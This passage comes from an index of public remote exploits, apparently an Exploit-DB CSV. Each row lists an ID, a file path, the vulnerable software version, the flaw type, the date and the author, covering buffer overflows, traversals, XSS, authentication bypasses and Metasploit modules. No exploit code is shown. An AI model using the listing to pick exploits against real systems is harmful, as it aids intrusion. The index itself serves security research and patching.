5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution",2012-12-02,kingcope,remote,windows, +23074,exploits/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level",2012-12-02,kingcope,remote,windows, +23079,exploits/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows, +23080,exploits/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows, +23081,exploits/multiple/remote/23081.pl,"MySQL - Unauthenticated Remote User Enumeration",2012-12-02,kingcope,remote,multiple, +23082,exploits/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass",2012-12-02,kingcope,remote,linux, +23083,exploits/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System",2012-12-02,kingcope,remote,windows, +23091,exploits/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",remote,windows, +23092,exploits/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",remote,windows, +23093,exploits/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",remote,windows, +23094,exploits/windows/remote/23094.txt,"Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 - Document Handling Buffer Overrun",2003-09-03,"eEye Digital Security Team",remote,windows, +23095,exploits/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",remote,windows, +23100,exploits/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun",2003-09-04,xfocus,remote,windows, +23113,exploits/windows/remote/23113.c,"Microsoft Exchange Server 4.0/5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,remote,windows, +23114,exploits/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,remote,windows, +23115,exploits/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,remote,linux, +23121,exploits/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,remote,windows, +23122,exploits/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)",2003-09-08,http-equiv,remote,windows, +23123,exploits/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,remote,windows, +23131,exploits/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution",2003-09-10,"Liu Die Yu & Jelmer",remote,windows, +23224,exploits/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution (Metasploit)",2012-12-09,Metasploit,remote,multiple, +23135,exploits/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 - WebAdmin Interface Information Disclosure",2003-09-10,"Phuong Nguyen",remote,windows, +23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,remote,multiple, +23137,exploits/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",remote,multiple, +23144,exploits/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal",2003-09-15,Winter-Smith,remote,windows, +23147,exploits/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 - Path Disclosure",2003-09-15,@stake,remote,windows, +23148,exploits/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 - Connection redirection",2003-09-15,@stake,remote,windows, +23149,exploits/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",remote,windows, +23151,exploits/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",remote,linux, +23152,exploits/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,remote,windows, +23155,exploits/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)",2012-12-05,Metasploit,remote,windows, +23156,exploits/unix/remote/23156.rb,"(SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,remote,unix, +23157,exploits/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",remote,windows, +23161,exploits/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow (1)",2003-09-19,"Carl Livitt",remote,linux, +23162,exploits/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow (2)",2003-09-19,"m00 security",remote,linux, +23171,exploits/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption",2003-09-23,V9,remote,linux, +23173,exploits/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure",2003-09-24,"Phuong Nguyen",remote,multiple, +23174,exploits/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",remote,multiple, +23176,exploits/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",remote,multiple, +23178,exploits/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)",2012-12-06,Metasploit,remote,multiple, +23179,exploits/windows/remote/23179.rb,"Oracle MySQL (Windows) - MOF Execution (Metasploit)",2012-12-06,Metasploit,remote,windows, +23182,exploits/linux/remote/23182.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,remote,linux, +23183,exploits/linux/remote/23183.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)",2003-11-04,snooq,remote,linux, +23185,exploits/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",remote,windows, +23186,exploits/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",remote,linux, +23187,exploits/cgi/remote/23187.txt,"SBox 1.0.4 - Full Path Disclosure",2003-09-25,"Julio e2fsck Cesar",remote,cgi, +23188,exploits/linux/remote/23188.c,"Athttpd 0.4b - GET Remote Buffer Overrun",2003-09-25,r-code,remote,linux, +23196,exploits/linux/remote/23196.c,"WebFS 1.x - 'Pathname' Buffer Overrun",2003-09-29,jsk,remote,linux, +23198,exploits/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",remote,windows, +23199,exploits/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing",2003-10-09,Syzop,remote,multiple, +23203,exploits/windows/remote/23203.rb,"IBM System Director Agent - DLL Injection (Metasploit)",2012-12-07,Metasploit,remote,windows, +23209,exploits/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",remote,windows, +23211,exploits/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",remote,windows, +23212,exploits/hardware/remote/23212.txt,"Cisco LEAP - Password Disclosure",2003-10-03,"Cisco Security",remote,hardware, +23221,exploits/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",remote,multiple, +23222,exploits/windows/remote/23222.txt,"Easy File Sharing Web Server 1.2 - Information Disclosure",2003-10-06,nimber@designer.ru,remote,windows, +23225,exploits/windows/remote/23225.rb,"Maxthon3 - about:history XCS Trusted Zone Code Execution (Metasploit)",2012-12-09,Metasploit,remote,windows, +23226,exploits/windows/remote/23226.rb,"Freefloat FTP Server - Arbitrary File Upload (Metasploit)",2012-12-09,Metasploit,remote,windows,21 +23227,exploits/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component - Command Injection (Metasploit)",2012-12-09,Metasploit,remote,unix, +23229,exploits/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,remote,windows, +23230,exploits/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - 'postURL'/'getURL' Restriction Bypass",2003-10-07,"GreyMagic Software",remote,multiple, +23243,exploits/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Remote Buffer Overflow",2012-12-09,D35m0nd142,remote,windows, +23247,exploits/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,remote,windows, +23404,exploits/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",remote,multiple, +23257,exploits/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",remote,multiple, +23265,exploits/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",remote,windows, +23270,exploits/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",remote,windows, +23271,exploits/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,remote,multiple, +23272,exploits/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 - Error Message Information Disclosure",2003-10-22,"Jon Hart",remote,solaris, +23387,exploits/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal",2003-11-17,nimber@designer.ru,remote,windows, +23282,exploits/multiple/remote/23282.txt,"Apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",remote,multiple, +23283,exploits/windows/remote/23283.txt,"Microsoft Internet Explorer 6 - Local Resource Reference",2003-10-24,Mindwarper,remote,windows, +23290,exploits/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,remote,windows, +23291,exploits/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,remote,multiple, +23295,exploits/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",remote,linux, +23296,exploits/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,remote,linux, +23298,exploits/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,remote,windows, +23304,exploits/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,remote,cgi, +23306,exploits/linux/remote/23306.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow",2003-10-27,d3ck4,remote,linux, +23307,exploits/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",remote,multiple, +23309,exploits/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",remote,multiple, +23312,exploits/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",remote,cgi, +23316,exploits/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting",2003-10-31,"Andy Davis",remote,windows, +23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware, +23318,exploits/windows/remote/23318.txt,"Ashley Brown iWeb Server - Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,remote,windows, +23320,exploits/multiple/remote/23320.txt,"MLdonkey 2.5-4 - Cross-Site Scripting",2003-10-31,"Chris Sharp",remote,multiple, +23321,exploits/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",remote,windows, +23323,exploits/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,remote,windows, +23328,exploits/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (1)",2003-11-03,airsupply,remote,windows, +23329,exploits/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (2)",2003-11-03,exworm,remote,windows, +23334,exploits/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - GET Buffer Overrun",2003-11-03,"Peter Winter-Smith",remote,windows, +23340,exploits/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",remote,windows, +23385,exploits/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",remote,multiple, +23365,exploits/windows/remote/23365.txt,"TelCondex SimpleWebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,remote,windows, +23366,exploits/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,remote,linux, +23368,exploits/linux/remote/23368.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)",2003-11-10,demz,remote,linux, +23369,exploits/linux/remote/23369.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (2)",2003-11-10,Li0n7,remote,linux, +23371,exploits/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Format String",2003-11-10,"Sebastian Krahmer",remote,linux, +23373,exploits/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,remote,windows, +23376,exploits/hardware/remote/23376.txt,"Fortigate Firewall 2.x - dlg Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",remote,hardware, +23377,exploits/hardware/remote/23377.txt,"Fortigate Firewall 2.x - Policy Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",remote,hardware, +23378,exploits/hardware/remote/23378.txt,"Fortigate Firewall 2.x - listdel Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",remote,hardware, +23379,exploits/hardware/remote/23379.txt,"Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",remote,hardware, +23380,exploits/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",remote,multiple, +23396,exploits/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",remote,multiple, +23397,exploits/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun",2003-11-24,Shadowinteger,remote,linux, +23398,exploits/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",remote,windows, +23399,exploits/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",remote,windows, +23400,exploits/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)",2003-11-25,"Liu Die",remote,windows, +23401,exploits/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",remote,windows, +23405,exploits/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",remote,multiple, +23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",remote,windows, +23413,exploits/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Remote Buffer Overflow",2003-12-05,c0wboy,remote,linux, +23417,exploits/windows/remote/23417.pl,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,remote,windows, +23419,exploits/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",remote,windows, +23422,exploits/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",remote,windows, +23423,exploits/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",remote,windows, +23449,exploits/unix/remote/23449.txt,"Xerox MicroServer - Web Server Directory Traversal",2003-12-19,"J.A. Gutierrez",remote,unix, +23450,exploits/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",remote,windows, +23451,exploits/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",remote,windows, +23433,exploits/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,remote,multiple, +23435,exploits/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,remote,windows, +23436,exploits/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,remote,windows, +23437,exploits/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,remote,windows, +23439,exploits/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",remote,multiple, +23441,exploits/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",remote,linux, +23446,exploits/windows/remote/23446.txt,"GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure",2002-12-17,"Luigi Auriemma",remote,windows, +23461,exploits/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal",2003-12-22,"Luigi Auriemma",remote,windows, +23464,exploits/windows/remote/23464.pl,"Opera 7.x - Directory Traversal",2003-11-15,nesumin,remote,windows, +23465,exploits/windows/remote/23465.txt,"Opera Browser 6.0 6 - URI Display Obfuscation",2003-12-23,nesumin,remote,windows, +23472,exploits/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow (Metasploit)",2012-12-18,Metasploit,remote,windows, +23489,exploits/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 - DLL Authentication Bypass",2003-12-29,Aphex,remote,windows, +23490,exploits/windows/remote/23490.txt,"Microsoft IIS 5.0 - Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",remote,windows, +23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,remote,windows, +23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,remote,windows, +23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",remote,windows, +23695,exploits/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,remote,windows, +23500,exploits/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,remote,windows, +23502,exploits/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",remote,windows, +23503,exploits/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",remote,windows, +23509,exploits/windows/remote/23509.c,"YaSoft Switch Off 2.3 - 'swnet.dll' Remote Buffer Overflow",2004-01-02,MrNice,remote,windows, +23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",remote,windows, +23522,exploits/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",remote,multiple, +23527,exploits/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware, +23528,exploits/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware, +23529,exploits/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,windows, +23531,exploits/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - 'Username' Format String",2004-01-12,mandragore,remote,windows, +23532,exploits/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal",2004-01-09,badpack3t,remote,windows, +23533,exploits/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",remote,windows, +23541,exploits/multiple/remote/23541.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",remote,multiple, +23542,exploits/multiple/remote/23542.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",remote,multiple, +23544,exploits/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal",2004-01-15,"Peter Winter-Smith",remote,windows, +23545,exploits/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 - Login Page Source Code Disclosure",2004-01-15,Procheckup,remote,hardware, +23552,exploits/windows/remote/23552.xml,"Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy",2004-01-19,"Marc Schoenefeld",remote,windows, +23555,exploits/windows/remote/23555.txt,"GoAhead Web Server 2.1.x - Directory Management Policy Bypass",2004-01-19,"Luigi Auriemma",remote,windows, +23557,exploits/multiple/remote/23557.txt,"aiptek netcam WebServer 0.93.15 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",remote,multiple, +23559,exploits/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface - Full Path Disclosure",2004-01-20,"Oliver Karow",remote,windows, +23560,exploits/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",remote,windows, +23562,exploits/windows/remote/23562.html,"2WIRE HomePortal Series - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",remote,windows, +23563,exploits/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting",2004-01-21,"Rafel Ivgi The-Insider",remote,multiple, +23564,exploits/multiple/remote/23564.txt,"Mephistoles HTTPd 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",remote,multiple, +23878,exploits/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload",2004-03-24,wirepair,remote,windows, +23877,exploits/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Directory Traversal",2004-03-24,"Ziv Kamir",remote,windows, +23579,exploits/unix/remote/23579.rb,"TWiki MAKETEXT - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,remote,unix, +23580,exploits/unix/remote/23580.rb,"Foswiki MAKETEXT - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,remote,unix, +23582,exploits/cgi/remote/23582.txt,"Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting",2004-01-22,"Rafel Ivgi The-Insider",remote,cgi, +23583,exploits/multiple/remote/23583.txt,"Netbus 2.0 Pro - Directory Listings Disclosure / Arbitrary File Upload",2004-01-22,"Rafel Ivgi The-Insider",remote,multiple, +23585,exploits/linux/remote/23585.txt,"Finjan SurfinGate 6.0/7.0 - FHTTP Restart Command Execution",2004-01-23,"David Byrne",remote,linux, +23586,exploits/netware/remote/23586.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware, +23587,exploits/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware, +23588,exploits/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware, +23589,exploits/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",remote,netware, +23591,exploits/windows/remote/23591.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)",2004-01-24,mandragore,remote,windows, +23592,exploits/windows/remote/23592.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)",2004-01-25,mslug@safechina.net,remote,windows, +23593,exploits/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 - isqlplus Cross-Site Scripting",2004-01-24,"Rafel Ivgi The-Insider",remote,multiple, +23594,exploits/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",remote,windows, +23596,exploits/windows/remote/23596.txt,"TinyServer 1.1 - Cross-Site Scripting",2004-01-24,"Donato Ferrante",remote,windows, +23597,exploits/windows/remote/23597.txt,"borland Web server for corel paradox 1.0 b3 - Directory Traversal",2004-01-24,"Rafel Ivgi The-Insider",remote,windows, +23598,exploits/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",remote,multiple, +23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple, +23694,exploits/windows/remote/23694.rb,"RealPlayer - '.RealMedia' File Handling Buffer Overflow (Metasploit)",2012-12-27,Metasploit,remote,windows, +23601,exploits/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,remote,multiple, +23603,exploits/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",remote,windows, +23604,exploits/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface 'NDCR' Remote Command Execution",2004-01-26,"Himeur Nourredine",remote,linux, +23605,exploits/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",remote,solaris, +23608,exploits/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",remote,windows, +23612,exploits/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",remote,windows, +23632,exploits/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",remote,windows, +23643,exploits/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",remote,windows, +23649,exploits/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution (Metasploit)",2012-12-25,Metasploit,remote,windows, +23650,exploits/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)",2012-12-25,Metasploit,remote,windows, +23651,exploits/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary '.PHP' File Upload (Metasploit)",2012-12-25,Metasploit,remote,php, +23652,exploits/php/remote/23652.rb,"WordPress Plugin Asset-Manager - Arbitrary '.PHP' File Upload (Metasploit)",2012-12-25,Metasploit,remote,php, +23668,exploits/windows/remote/23668.txt,"Microsoft Internet Explorer 5.0.1 - LoadPicture File Enumeration",2004-02-07,Jelmer,remote,windows, +23671,exploits/linux/remote/23671.txt,"Caucho Technology Resin 2.1.12 - Directory Listings Disclosure",2004-02-09,"Wang Yun",remote,linux, +23675,exploits/windows/remote/23675.txt,"Microsoft Windows XP - HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",remote,windows, +23678,exploits/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",remote,windows, +23679,exploits/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng 